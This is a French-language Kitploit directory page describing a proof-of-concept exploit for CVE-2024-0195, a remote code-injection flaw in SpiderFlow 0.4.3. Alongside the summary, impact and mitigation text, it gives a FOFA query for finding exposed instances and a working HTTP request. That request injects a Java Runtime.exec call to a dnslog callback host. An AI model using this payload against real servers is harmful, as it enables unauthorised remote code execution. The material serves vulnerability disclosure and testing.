Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-0195-SpiderFlow — Exploit de preuve de concept pour CVE-2024-0195, une vulnérabilité critique d'injection de code dans SpiderFlow 0.4.3 permettant l'exécution de code à distance via le point de terminaison FunctionService.saveFunction. | Kitploit
Outils/GitHubGitHub/hack-with-rohit/cve-2024-0195-spiderflow
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubhack-with-rohit/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

Exploit de preuve de concept pour CVE-2024-0195, une vulnérabilité critique d'injection de code dans SpiderFlow 0.4.3 permettant l'exécution de code à distance via le point de terminaison FunctionService.saveFunction.

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-0195 Contrôle inapproprié de la génération de code ('Injection de code') Critique 2024

Résumé

CVE-2024-0195 est une vulnérabilité critique d'injection de code dans l'application web spider-flow 0.4.3, spécifiquement dans la fonction FunctionService.saveFunction du fichier FunctionController.java. Un attaquant peut injecter à distance du code malveillant qui s'exécute sur le serveur. Cela permet une compromission totale de l'application.

Impact..

Cette vulnérabilité est extrêmement grave car elle permet l'exécution de code à distance sur le serveur hébergeant l'application spider-flow vulnérable. Un attaquant pourrait compromettre totalement le serveur, voler des données sensibles, installer des logiciels malveillants ou des mineurs de crypto-monnaies, et l'utiliser pour d'autres attaques à l'intérieur du réseau. La confidentialité, l'intégrité et la disponibilité de l'application et du serveur sont toutes gravement impactées.

Correctif

Une version corrigée n'est pas explicitement mentionnée, donc corriger le problème ne semble actuellement pas une option. La vulnérabilité a été divulguée publiquement et des exploits sont disponibles, une atténuation immédiate est donc cruciale.

Atténuation

En attendant qu'un correctif officiel soit publié, spider-flow 0.4.3 doit être immédiatement mis hors ligne ou son accès limité aux réseaux/utilisateurs de confiance. Des pare-feu d'application web ou d'autres contrôles de validation d'entrée pourraient potentiellement être configurés pour détecter et bloquer les tentatives d'injection de code en tant qu'atténuation provisoire. Cependant, ce ne sont pas des solutions complètes et la version vulnérable doit être mise à niveau dès qu'une version corrigée est disponible.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Exploitation

FOFA : app="spiderflow"

✔ Preuve de concept

root@kitploit:~
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
Télécharger l’outil